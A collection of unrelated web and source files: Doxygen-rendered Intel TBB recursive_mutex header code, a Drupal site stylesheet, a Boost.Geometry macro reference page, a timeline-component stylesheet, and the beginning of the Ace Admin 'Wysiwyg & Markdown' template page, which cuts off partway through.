class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00174"></a>00174 } <a name="l00175"></a>00175 <a name="l00177"></a>00177 <a name="l00178"></a><a class="code" href="a00192.html#86e719b0afee25704af11ab97694d240">00178</a> <span class="keywordtype">bool</span> <a class="code" href="a00192.html#86e719b0afee25704af11ab97694d240">try_lock</a>() { <a name="l00179"></a>00179 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00180"></a>00180 <span class="preprocessor"></span> <a class="code" href="a00144.html">aligned_space&lt;scoped_lock,1&gt;</a> tmp; <a name="l00181"></a>00181 <span class="keywordflow">return</span> (<span class="keyword">new</span>(tmp.<a class="code" href="a00144.html#0d702fc6b9e9d061ace3501b3c861cdf">begin</a>()) <a class="code" href="a00193.html">scoped_lock</a>)-&gt;internal_try_acquire(*<span class="keyword">this</span>); <a name="l00182"></a>00182 <span class="preprocessor">#else </span> <a name="l00183"></a>00183 <span class="preprocessor"></span><span class="preprocessor"> #if _WIN32||_WIN64</span> <a name="l00184"></a>00184 <span class="preprocessor"></span> <span class="keywordflow">return</span> TryEnterCriticalSection(&amp;impl)!=0; <a name="l00185"></a>00185 <span class="preprocessor"> #else</span> <a name="l00186"></a>00186 <span class="preprocessor"></span> <span class="keywordflow">return</span> pthread_mutex_trylock(&amp;impl)==0; <a name="l00187"></a>00187 <span class="preprocessor"> #endif </span><span class="comment">/* _WIN32||_WIN64 */</span> <a name="l00188"></a>00188 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00189"></a>00189 } <a name="l00190"></a>00190 <a name="l00192"></a><a class="code" href="a00192.html#f0a96e26b7f074588dc31e32524856ae">00192</a> <span class="keywordtype">void</span> <a class="code" href="a00192.html#f0a96e26b7f074588dc31e32524856ae">unlock</a>() { <a name="l00193"></a>00193 <span class="preprocessor">#if TBB_USE_ASSERT</span> <a name="l00194"></a>00194 <span class="preprocessor"></span> <a class="code" href="a00144.html">aligned_space&lt;scoped_lock,1&gt;</a> tmp; <a name="l00195"></a>00195 <a class="code" href="a00193.html">scoped_lock</a>&amp; s = *tmp.<a class="code" href="a00144.html#0d702fc6b9e9d061ace3501b3c861cdf">begin</a>(); <a name="l00196"></a>00196 s.<a class="code" href="a00193.html#3efd10a49e2435ea5215b49907f93ba2">my_mutex</a> = <span class="keyword">this</span>; <a name="l00197"></a>00197 s.<a class="code" href="a00193.html#43ed37cec508072e53a52113c8040137">internal_release</a>(); <a name="l00198"></a>00198 <span class="preprocessor">#else</span> <a name="l00199"></a>00199 <span class="preprocessor"></span><span class="preprocessor"> #if _WIN32||_WIN64</span> <a name="l00200"></a>00200 <span class="preprocessor"></span> LeaveCriticalSection(&amp;impl); <a name="l00201"></a>00201 <span class="preprocessor"> #else</span> <a name="l00202"></a>00202 <span class="preprocessor"></span> pthread_mutex_unlock(&amp;impl); <a name="l00203"></a>00203 <span class="preprocessor"> #endif </span><span class="comment">/* _WIN32||_WIN64 */</span> <a name="l00204"></a>00204 <span class="preprocessor">#endif </span><span class="comment">/* TBB_USE_ASSERT */</span> <a name="l00205"></a>00205 } <a name="l00206"></a>00206 <a name="l00208"></a>00208 <span class="preprocessor"> #if _WIN32||_WIN64</span> <a name="l00209"></a><a class="code" href="a00192.html#889fa8cc32dd707eef7c0f52dda09c0d">00209</a> <span class="preprocessor"></span> <span class="keyword">typedef</span> LPCRITICAL_SECTION <a class="code" href="a00192.html#889fa8cc32dd707eef7c0f52dda09c0d">native_handle_type</a>; <a name="l00210"></a>00210 <span class="preprocessor"> #else</span> <a name="l00211"></a>00211 <span class="preprocessor"></span> <span class="keyword">typedef</span> pthread_mutex_t* <a class="code" href="a00192.html#889fa8cc32dd707eef7c0f52dda09c0d">native_handle_type</a>; <a name="l00212"></a>00212 <span class="preprocessor"> #endif</span> <a name="l00213"></a>00213 <span class="preprocessor"></span> <a class="code" href="a00192.html#889fa8cc32dd707eef7c0f52dda09c0d">native_handle_type</a> native_handle() { <span class="keywordflow">return</span> (<a class="code" href="a00192.html#889fa8cc32dd707eef7c0f52dda09c0d">native_handle_type</a>) &amp;impl; } <a name="l00214"></a>00214 <a name="l00215"></a>00215 <span class="keyword">private</span>: <a name="l00216"></a>00216 <span class="preprocessor">#if _WIN32||_WIN64</span> <a name="l00217"></a>00217 <span class="preprocessor"></span> CRITICAL_SECTION impl; <a name="l00218"></a>00218 <span class="keyword">enum</span> state_t { <a name="l00219"></a>00219 INITIALIZED=0x1234, <a name="l00220"></a>00220 DESTROYED=0x789A, <a name="l00221"></a>00221 } state; <a name="l00222"></a>00222 <span class="preprocessor">#else</span> <a name="l00223"></a>00223 <span class="preprocessor"></span> pthread_mutex_t impl; <a name="l00224"></a>00224 <span class="preprocessor">#endif </span><span class="comment">/* _WIN32||_WIN64 */</span> <a name="l00225"></a>00225 <a name="l00227"></a>00227 <span class="keywordtype">void</span> __TBB_EXPORTED_METHOD internal_construct(); <a name="l00228"></a>00228 <a name="l00230"></a>00230 <span class="keywordtype">void</span> __TBB_EXPORTED_METHOD internal_destroy(); <a name="l00231"></a>00231 }; <a name="l00232"></a>00232 <a name="l00233"></a>00233 __TBB_DEFINE_PROFILING_SET_NAME(recursive_mutex) <a name="l00234"></a>00234 <a name="l00235"></a>00235 } <span class="comment">// namespace tbb </span> <a name="l00236"></a>00236 <a name="l00237"></a>00237 <span class="preprocessor">#endif </span><span class="comment">/* __TBB_recursive_mutex_H */</span> </pre></div><hr> <p></p> Copyright &copy; 2005-2010 Intel Corporation. All Rights Reserved. <p></p> Intel, Pentium, Intel Xeon, Itanium, Intel XScale and VTune are registered trademarks or trademarks of Intel Corporation or its subsidiaries in the United States and other countries. <p></p> * Other names and brands may be claimed as the property of others.
sites/all/modules/nbainfo_general/css/nbainfo_general.css
ichionid/nbainfo_backup
body.node-type-forum .field-name-comment-body img { width: auto!important; height: auto!important; } .node-type-blog .group-left { padding-left: 1%; } body.node-type-forum .forum-post-links ul.links li.comment-add, body.node-type-forum .forum-post-links ul.links li.comment-reply { display: none; } div.pane-nbainfo-general-nba-info-score-block object { float: right; margin-top: 11% } /*Feed from NBA.com*/ div.pane-aggregator-feed-1 li { list-style-type: none; } div.pane-aggregator-feed-1 li { border-bottom: silver; border-bottom-style: solid; border-bottom-width: thin; } div.pane-aggregator-feed-1 .more-link { display: none; } div.pane-aggregator-feed-1 li a { padding-left: 1%; } h1#page-title { display: inline-table; } /*Frontpage*/ div.panels-flexible-region-2-twitter, div.panels-flexible-region-2-chat { top: -19px; position: relative; } div.shoutbox-all-shouts { display: none; } div.pane-content .shoutbox-add-form input#edit-message { width: 50%; } div.shoutbox-add-form .fieldset-wrapper { margin: 0; } div.shoutbox-add-form .form-wrapper { margin-top: 0; top: 0; margin-bottom: 0; } div.pane-content #shoutbox-body { height: 292px; } #block-superfish-1 li a { font-weight: bold; } div.pane-dagens-billet-view .more-link { display: none; } #content div.panels-flexible-region-2-center h2.pane-title, #page-wrapper #content .pane-blogs h2.pane-title { font-size: 2.8em; }
myodd/boost/libs/geometry/doc/html/geometry/reference/adapted/register/boost_geometry_register_multi_linestring_templated.html
FFMG/myoddweb.piger
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>BOOST_GEOMETRY_REGISTER_MULTI_LINESTRING_TEMPLATED</title> <link rel="stylesheet" href="../../../../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="../../../../index.html" title="Chapter&#160;1.&#160;Geometry"> <link rel="up" href="../register.html" title="Macro's for adaption"> <link rel="prev" href="boost_geometry_register_multi_linestring.html" title="BOOST_GEOMETRY_REGISTER_MULTI_LINESTRING"> <link rel="next" href="boost_geometry_register_multi_point.html" title="BOOST_GEOMETRY_REGISTER_MULTI_POINT"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../../boost.png"></td> <td align="center"><a href="../../../../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="boost_geometry_register_multi_linestring.html"><img src="../../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../register.html"><img src="../../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../index.html"><img src="../../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="boost_geometry_register_multi_point.html"><img src="../../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="section"> <div class="titlepage"><div><div><h5 class="title"> <a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated"></a><a class="link" href="boost_geometry_register_multi_linestring_templated.html" title="BOOST_GEOMETRY_REGISTER_MULTI_LINESTRING_TEMPLATED">BOOST_GEOMETRY_REGISTER_MULTI_LINESTRING_TEMPLATED</a> </h5></div></div></div> <p> <a class="indexterm" name="idm45253216409664"></a> Macro to register a templated multi_linestring. </p> <h6> <a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.h0"></a> <span class="phrase"><a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.description"></a></span><a class="link" href="boost_geometry_register_multi_linestring_templated.html#geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.description">Description</a> </h6> <p> The macro BOOST_GEOMETRY_REGISTER_MULTI_LINESTRING_TEMPLATED registers a templated multi_linestring such that it is recognized by Boost.Geometry and that Boost.Geometry functionality can used with the specified type. The type must have one template parameter, which should be a linestring type, and should not be specified. Boost.Geometry takes care of inserting the template parameter. Hence all types of this templated multi_linestring are registered, regardless of their point type. </p> <h6> <a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.h1"></a> <span class="phrase"><a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.synopsis"></a></span><a class="link" href="boost_geometry_register_multi_linestring_templated.html#geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.synopsis">Synopsis</a> </h6> <p> </p> <pre class="programlisting"><span class="preprocessor">#define</span> <span class="identifier">BOOST_GEOMETRY_REGISTER_MULTI_LINESTRING_TEMPLATED</span><span class="special">(</span><span class="identifier">MultiLineString</span><span class="special">)</span></pre> <p> </p> <h6> <a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.h2"></a> <span class="phrase"><a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.parameters"></a></span><a class="link" href="boost_geometry_register_multi_linestring_templated.html#geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.parameters">Parameters</a> </h6> <div class="informaltable"><table class="table"> <colgroup> <col> <col> </colgroup> <thead><tr> <th> <p> Name </p> </th> <th> <p> Description </p> </th> </tr></thead> <tbody><tr> <td> <p> MultiLineString </p> </td> <td> <p> multi_linestring (without template parameters) type to be registered </p> </td> </tr></tbody> </table></div> <h6> <a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.h3"></a> <span class="phrase"><a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.header"></a></span><a class="link" href="boost_geometry_register_multi_linestring_templated.html#geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.header">Header</a> </h6> <p> <code class="computeroutput"><span class="preprocessor">#include</span> <span class="special">&lt;</span><span class="identifier">boost</span><span class="special">/</span><span class="identifier">geometry</span><span class="special">/</span><span class="identifier">geometries</span><span class="special">/</span><span class="keyword">register</span><span class="special">/</span><span class="identifier">multi_linestring</span><span class="special">.</span><span class="identifier">hpp</span><span class="special">&gt;</span></code> </p> <h6> <a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.h4"></a> <span class="phrase"><a name="geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.example"></a></span><a class="link" href="boost_geometry_register_multi_linestring_templated.html#geometry.reference.adapted.register.boost_geometry_register_multi_linestring_templated.example">Example</a> </h6> <p> [register_multi_linestring_templated] [register_multi_linestring_templated_output] </p> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2009-2015 Barend Gehrels, Bruno Lalande, Mateusz Loskot, Adam Wulkiewicz, Oracle and/or its affiliates<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="boost_geometry_register_multi_linestring.html"><img src="../../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../register.html"><img src="../../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../index.html"><img src="../../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="boost_geometry_register_multi_point.html"><img src="../../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
assets/verticaltimeline/css/component.css
taianunes/boleto-control
@font-face { font-family: 'ecoico'; src:url('../fonts/timelineicons/ecoico.eot'); src:url('../fonts/timelineicons/ecoico.eot?#iefix') format('embedded-opentype'), url('../fonts/timelineicons/ecoico.woff') format('woff'), url('../fonts/timelineicons/ecoico.ttf') format('truetype'), url('../fonts/timelineicons/ecoico.svg#ecoico') format('svg'); font-weight: normal; font-style: normal; } /* Made with http://icomoon.io/ */ /* verde logo abepps #9BCD66*/ /* azul logo abepps #00AEE7*/ .cbp_tmtimeline { margin: 30px 0 0 0; padding: 0; list-style: none; position: relative; } /* The line */ .cbp_tmtimeline:before { content: ''; position: absolute; top: 0; bottom: 0; width: 10px; background: #00AEE7; left: 20%; margin-left: -10px; } /* The date/time */ .cbp_tmtimeline > li .cbp_tmtime { display: block; width: 25%; padding-right: 100px; position: absolute; } .cbp_tmtimeline > li .cbp_tmtime span { display: block; text-align: right; } .cbp_tmtimeline > li .cbp_tmtime span:first-child { font-size: 1.5em; color: #00AEE7; /*color: #bdd0db;*/ } /*.cbp_tmtimeline > li:nth-child(odd) .cbp_tmtime span:first-child { color: #9BCD66; }*/ .cbp_tmtimeline > li .cbp_tmtime span:last-child { font-size: 1.0em; color: #00AEE7; /*color: #3594cb;*/ } /*.cbp_tmtimeline > li:nth-child(odd) .cbp_tmtime span:last-child { color: #9BCD66; } */ /* Right content */ .cbp_tmtimeline > li .cbp_tmlabel { margin: 0 0 15px 25%; /*background: #3594cb;*/ border: 10px solid #9BCD66; /*background: #9BCD66;*/ color: #000000; padding: 2em; font-size: 1.2em; font-weight: 300; line-height: 1.4; position: relative; border-radius: 5px; } /* .cbp_tmtimeline > li:nth-child(odd) .cbp_tmlabel { background: #9BCD66; /*background: #6cbfee; }*/ .cbp_tmtimeline > li .cbp_tmlabel h2 { margin-top: 0px; padding: 0 0 10px 0; border-bottom: 1px solid rgba(255,255,255,0.4); } /* The triangle */ .cbp_tmtimeline > li .cbp_tmlabel:after { right: 100%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none; border-right-color: #9BCD66; /*border-right-color: #3594cb;*/ border-width: 20px; top: -10px; } /*.cbp_tmtimeline > li:nth-child(odd) .cbp_tmlabel:after { border-right-color: #6cbfee; border-right-color: #9BCD66; }*/ /* The icons */ .cbp_tmtimeline > li .cbp_tmicon { width: 40px; height: 40px; font-family: 'ecoico'; speak: none; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; font-size: 1.4em; line-height: 40px; -webkit-font-smoothing: antialiased; position: absolute; color: #fff; border-radius: 50%; /*box-shadow: 0 0 0 8px #afdcf8;*/ box-shadow: 0 0 0 8px #00AEE7; text-align: center; left: 20%; /*top: 0;*/ margin: 0 0 0 -25px; } .cbp_tmtimeline > li .cbp_red_icon{ background: #E74C3C; } .cbp_tmtimeline > li .cbp_gren_icon{ background: #2ECC71; } .cbp_tmicon-phone:before { content: "\e000"; } .cbp_tmicon-screen:before { content: "\e001"; } .cbp_tmicon-mail:before { content: "\e002"; } .cbp_tmicon-earth:before { content: "\e003"; } /* Example Media Queries */ @media screen and (max-width: 65.375em) { .cbp_tmtimeline > li .cbp_tmtime span:last-child { font-size: 1.5em; } } @media screen and (max-width: 47.2em) { .cbp_tmtimeline:before { display: none; } .cbp_tmtimeline > li .cbp_tmtime { width: 100%; position: relative; padding: 0 0 20px 0; } .cbp_tmtimeline > li .cbp_tmtime span { text-align: left; } .cbp_tmtimeline > li .cbp_tmlabel { margin: 0 0 30px 0; padding: 1em; font-weight: 400; font-size: 95%; } .cbp_tmtimeline > li .cbp_tmlabel:after { right: auto; left: 20px; border-right-color: transparent; border-bottom-color: #3594cb; top: -20px; } .cbp_tmtimeline > li:nth-child(odd) .cbp_tmlabel:after { border-right-color: transparent; border-bottom-color: #6cbfee; } .cbp_tmtimeline > li .cbp_tmicon { position: relative; float: right; left: auto; margin: -55px 5px 0 0px; } } /* Abepps Custom CSS - Page Assinatura */ /* Novo Boleto button */ .reunBar input.button1 { margin: 0 54px 0 0; float: right; display: all; font-family: 'MyriadWebPro-Bold'; font-size: 20px; font-weight: normal; line-height: 38px; text-align: center; text-decoration: none; color: #000000; border: 2px solid #9BCD66; padding: 0 10px; border-radius: 5px 5px 5px 5px; background-color: #00AEE7; } /* Ver Boleto button */ .cbp_tmtime > a.button2 { margin: 0 0 0 0px; float: right; display: all; font-family: 'MyriadWebPro-Bold'; font-size: px; font-weight: normal; line-height: 38px; text-align: center; text-decoration: none; color: #000000; border: 2px solid #9BCD66; padding: 0 10px; border-radius: 5px 5px 5px 5px; } /* Submit date button 15*/ .cbp_tmtimeline input.button3 { margin: 0 0 0 50px; float: right; display: block; font-family: 'MyriadWebPro-Bold'; font-size: 15px; font-weight: normal; color: #FFFFFF; line-height: 38px; text-align: center; text-decoration: none; border: 2px solid #9BCD66; color: #000000; padding: 0 10px; border-radius: 5px 5px 5px 5px; background-color: #00AEE7; }
templates/admin/wysiwyg.html
venjiang/mons
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>Wysiwyg &amp; Markdown Editor - Ace Admin</title> <meta name="description" content="" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <!-- basic styles --> <link href="assets/css/bootstrap.min.css" rel="stylesheet" /> <link href="assets/css/bootstrap-responsive.min.css" rel="stylesheet" /> <link rel="stylesheet" href="assets/css/font-awesome.min.css" /> <!--[if IE 7]> <link rel="stylesheet" href="assets/css/font-awesome-ie7.min.css" /> <![endif]--> <!-- page specific plugin styles --> <link rel="stylesheet" href="assets/css/jquery-ui-1.10.3.custom.min.css" /> <!-- fonts --> <link rel="stylesheet" href="assets/css/ace-fonts.css" /> <!-- ace styles --> <link rel="stylesheet" href="assets/css/ace.min.css" /> <link rel="stylesheet" href="assets/css/ace-responsive.min.css" /> <link rel="stylesheet" href="assets/css/ace-skins.min.css" /> <!--[if lte IE 8]> <link rel="stylesheet" href="assets/css/ace-ie.min.css" /> <![endif]--> <!-- inline styles related to this page --> <!-- ace settings handler --> <script src="assets/js/ace-extra.min.js"></script> </head> <body> <div class="navbar" id="navbar"> <script type="text/javascript"> try{ace.settings.check('navbar' , 'fixed')}catch(e){} </script> <div class="navbar-inner"> <div class="container-fluid"> <a href="#" class="brand"> <small> <i class="icon-leaf"></i> Ace Admin </small> </a><!-- /.brand --> <ul class="nav ace-nav pull-right"> <li class="grey"> <a data-toggle="dropdown" class="dropdown-toggle" href="#"> <i class="icon-tasks"></i> <span class="badge badge-grey">4</span> </a> <ul class="pull-right dropdown-navbar dropdown-menu dropdown-caret dropdown-closer"> <li class="nav-header"> <i class="icon-ok"></i> 4 Tasks to complete </li> <li> <a href="#"> <div class="clearfix"> <span class="pull-left">Software Update</span> <span class="pull-right">65%</span> </div> <div class="progress progress-mini "> <div style="width:65%" class="bar"></div> </div> </a> </li> <li> <a href="#"> <div class="clearfix"> <span class="pull-left">Hardware Upgrade</span> <span class="pull-right">35%</span> </div> <div class="progress progress-mini progress-danger"> <div style="width:35%" class="bar"></div> </div> </a> </li> <li> <a href="#"> <div class="clearfix"> <span class="pull-left">Unit Testing</span> <span class="pull-right">15%</span> </div> <div class="progress progress-mini progress-warning"> <div style="width:15%" class="bar"></div> </div> </a> </li> <li> <a href="#"> <div class="clearfix"> <span class="pull-left">Bug Fixes</span> <span class="pull-right">90%</span> </div> <div class="progress progress-mini progress-success progress-striped active"> <div style="width:90%" class="bar"></div> </div> </a> </li> <li> <a href="#"> See tasks with details <i class="icon-arrow-right"></i> </a> </li> </ul> </li> <li class="purple"> <a data-toggle="dropdown" class="dropdown-toggle" href="#"> <i class="icon-bell-alt icon-animated-bell"></i> <span class="badge badge-important">8</span> </a> <ul class="pull-right dropdown-navbar navbar-pink dropdown-menu dropdown-caret dropdown-closer"> <li class="nav-header"> <i class="icon-warning-sign"></i> 8 Notifications </li> <li> <a href="#"> <div class="clearfix"> <span class="pull-left"> <i class="btn btn-mini no-hover btn-pink icon-comment"></i> New Comments </span> <span class="pull-right badge badge-info">+12</span> </div> </a> </li> <li> <a href="#"> <i class="btn btn-mini btn-primary icon-user"></i> Bob just signed up as an editor ... </a> </li> <li> <a href="#"> <div class="clearfix"> <span class="pull-left"> <i class="btn btn-mini no-hover btn-success icon-shopping-cart"></i> New Orders </span> <span class="pull-right badge badge-success">+8</span> </div> </a> </li> <li> <a href="#"> <div class="clearfix"> <span class="pull-left"> <i class="btn btn-mini no-hover btn-info icon-twitter"></i> Followers </span> <span class="pull-right badge badge-info">+11</span> </div> </a> </li> <li> <a href="#"> See all notifications <i class="icon-arrow-right"></i> </a> </li> </ul> </li> <li class="green"> <a data-toggle="dropdown" class="dropdown-toggle" href="#"> <i class="icon-envelope icon-animated-vertical"></i> <span class="badge badge-success">5</span> </a> <ul class="pull-right dropdown-navbar dropdown-menu dropdown-caret dropdown-closer"> <li class="nav-header"> <i class="icon-envelope-alt"></i> 5 Messages </li> <li> <a href="#"> <img src="assets/avatars/avatar.png" class="msg-photo" alt="Alex's Avatar" /> <span class="msg-body"> <span class="msg-title"> <span class="blue">Alex:</span> Ciao sociis natoque penatibus et auctor ... </span> <span class="msg-time"> <i class="icon-time"></i> <span>a moment ago</span> </span> </span> </a> </li> <li> <a href="#"> <img src="assets/avatars/avatar3.png" class="msg-photo" alt="Susan's Avatar" /> <span class="msg-body"> <span class="msg-title"> <span class="blue">Susan:</span> Vestibulum id ligula porta felis euismod ... </span> <span class="msg-time"> <i class="icon-time"></i> <span>20 minutes ago</span> </span> </span> </a> </li> <li> <a href="#"> <img src="assets/avatars/avatar4.png" class="msg-photo" alt="Bob's Avatar" /> <span class="msg-body"> <span class="msg-title"> <span class="blue">Bob:</span> Nullam quis risus eget urna mollis ornare ... </span> <span class="msg-time"> <i class="icon-time"></i> <span>3:15 pm</span> </span> </span> </a> </li> <li> <a href="#"> See all messages <i class="icon-arrow-right"></i> </a> </li> </ul> </li> <li class="light-blue"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> <img class="nav-user-photo" src="assets/avatars/user.jpg" alt="Jason's Photo" /> <span class="user-info"> <small>Welcome,</small> Jason </span> <i class="icon-caret-down"></i> </a> <ul class="user-menu pull-right dropdown-menu dropdown-yellow dropdown-caret dropdown-closer"> <li> <a href="#"> <i class="icon-cog"></i> Settings </a> </li> <li> <a href="#"> <i class="icon-user"></i> Profile </a> </li> <li class="divider"></li> <li> <a href="#"> <i class="icon-off"></i> Logout </a> </li> </ul> </li> </ul><!-- /.ace-nav --> </div><!-- /.container-fluid --> </div><!-- /.navbar-inner --> </div> <div class="main-container container-fluid"> <a class="menu-toggler" id="menu-toggler" href="#"> <span class="menu-text"></span> </a> <div class="sidebar" id="sidebar"> <script type="text/javascript"> try{ace.settings.check('sidebar' , 'fixed')}catch(e){} </script> <div class="sidebar-shortcuts" id="sidebar-shortcuts"> <div class="sidebar-shortcuts-large" id="sidebar-shortcuts-large"> <button class="btn btn-small btn-success"> <i class="icon-signal"></i> </button> <button class="btn btn-small btn-info"> <i class="icon-pencil"></i> </button> <button class="btn btn-small btn-warning"> <i class="icon-group"></i> </button> <button class="btn btn-small btn-danger"> <i class="icon-cogs"></i> </button> </div> <div class="sidebar-shortcuts-mini" id="sidebar-shortcuts-mini"> <span class="btn btn-success"></span> <span class="btn btn-info"></span> <span class="btn btn-warning"></span> <span class="btn btn-danger"></span> </div> </div><!-- #sidebar-shortcuts --> <ul class="nav nav-list"> <li> <a href="index.html"> <i class="icon-dashboard"></i> <span class="menu-text"> Dashboard </span> </a> </li> <li> <a href="typography.html"> <i class="icon-text-width"></i> <span class="menu-text"> Typography </span> </a> </li> <li> <a href="#" class="dropdown-toggle"> <i class="icon-desktop"></i> <span class="menu-text"> UI Elements </span> <b class="arrow icon-angle-down"></b> </a> <ul class="submenu"> <li> <a href="elements.html"> <i class="icon-double-angle-right"></i> Elements </a> </li> <li> <a href="buttons.html"> <i class="icon-double-angle-right"></i> Buttons &amp; Icons </a> </li> <li> <a href="treeview.html"> <i class="icon-double-angle-right"></i> Treeview </a> </li> <li> <a href="jquery-ui.html"> <i class="icon-double-angle-right"></i> jQuery UI </a> </li> <li> <a href="nestable-list.html"> <i class="icon-double-angle-right"></i> Nestable Lists </a> </li> <li> <a href="#" class="dropdown-toggle"> <i class="icon-double-angle-right"></i> Three Level Menu <b class="arrow icon-angle-down"></b> </a> <ul class="submenu"> <li> <a href="#"> <i class="icon-leaf"></i> Item #1 </a> </li> <li> <a href="#" class="dropdown-toggle"> <i class="icon-pencil"></i> 4th level <b class="arrow icon-angle-down"></b> </a> <ul class="submenu"> <li> <a href="#"> <i class="icon-plus"></i> Add Product </a> </li> <li> <a href="#"> <i class="icon-eye-open"></i> View Products </a> </li> </ul> </li> </ul> </li> </ul> </li> <li> <a href="#" class="dropdown-toggle"> <i class="icon-list"></i> <span class="menu-text"> Tables </span> <b class="arrow icon-angle-down"></b> </a> <ul class="submenu"> <li> <a href="tables.html"> <i class="icon-double-angle-right"></i> Simple &amp; Dynamic </a> </li> <li> <a href="jqgrid.html"> <i class="icon-double-angle-right"></i> jqGrid plugin </a> </li> </ul> </li> <li class="active open"> <a href="#" class="dropdown-toggle"> <i class="icon-edit"></i> <span class="menu-text"> Forms </span> <b class="arrow icon-angle-down"></b> </a> <ul class="submenu"> <li> <a href="form-elements.html"> <i class="icon-double-angle-right"></i> Form Elements </a> </li> <li> <a href="form-wizard.html"> <i class="icon-double-angle-right"></i> Wizard &amp; Validation </a> </li> <li class="active"> <a href="wysiwyg.html"> <i class="icon-double-angle-right"></i> Wysiwyg &amp; Markdown </a> </li> <li> <a href="dropzone.html"> <i class="icon-double-angle-right"></i> Dropzone File Upload </a> </li> </ul> </li> <li> <a href="widgets.html"> <i class="icon-list-alt"></i> <span class="menu-text"> Widgets </span> </a> </li> <li> <a href="calendar.html"> <i class="icon-calendar"></i> <span class="menu-text"> Calendar <span class="badge badge-transparent tooltip-error" title="2&nbsp;Important&nbsp;Events"> <i class="icon-warning-sign red bigger-130"></i> </span> </span> </a> </li> <li> <a href="gallery.html"> <i class="icon-picture"></i> <span class="menu-text"> Gallery </span> </a> </li> <li> <a href="#" class="dropdown-toggle"> <i class="icon-tag"></i> <span class="menu-text"> More Pages </span> <b class="arrow icon-angle-down"></b> </a> <ul class="submenu"> <li> <a href="profile.html"> <i class="icon-double-angle-right"></i> User Profile </a> </li> <li> <a href="inbox.html"> <i class="icon-double-angle-right"></i> Inbox </a> </li> <li> <a href="pricing.html"> <i class="icon-double-angle-right"></i> Pricing Tables </a> </li> <li> <a href="invoice.html"> <i class="icon-double-angle-right"></i> Invoice </a> </li> <li> <a href="timeline.html"> <i class="icon-double-angle-right"></i> Timeline </a> </li> <li> <a href="login.html"> <i class="icon-double-angle-right"></i> Login &amp; Register </a> </li> </ul> </li> <li> <a href="#" class="dropdown-toggle"> <i class="icon-file-alt"></i> <span class="menu-text"> Other Pages <span class="badge badge-primary ">5</span> </span> <b class="arrow icon-angle-down"></b> </a> <ul class="submenu"> <li> <a href="faq.html"> <i class="icon-double-angle-right"></i> FAQ </a> </li> <li> <a href="error-404.html"> <i class="icon-double-angle-right"></i> Error 404 </a> </li> <li> <a href="error-500.html"> <i class="icon-double-angle-right"></i> Error 500 </a> </li> <li> <a href="grid.html"> <i class="icon-double-angle-right"></i> Grid </a> </li> <li> <a href="blank.html"> <i class="icon-double-angle-right"></i> Blank Page </a> </li> </ul> </li> </ul><!-- /.nav-list --> <div class="sidebar-collapse" id="sidebar-collapse"> <i class="icon-double-angle-left" data-icon1="icon-double-angle-left" data-icon2="icon-double-angle-right"></i> </div> <script type="text/javascript"> try{ace.settings.check('sidebar' , 'collapsed')}catch(e){} </script> </div> <div class="main-content"> <div class="breadcrumbs" id="breadcrumbs"> <script type="text/javascript"> try{ace.settings.check('breadcrumbs' , 'fixed')}catch(e){} </script> <ul class="breadcrumb"> <li> <i class="icon-home home-icon"></i> <a href="#">Home</a> <span class="divider"> <i class="icon-angle-right arrow-icon"></i> </span> </li> <li> <a href="#">Forms</a> <span class="divider"> <i class="icon-angle-right arrow-icon"></i> </span> </li> <li class="active">Wysiwyg &amp; Markdown</li> </ul><!-- .breadcrumb --> <div class="nav-search" id="nav-search"> <form class="form-search"> <span class="input-icon"> <input type="text" placeholder="Search ..." class="input-small nav-search-input" id="nav-search-input" autocomplete="off" /> <i class="icon-search 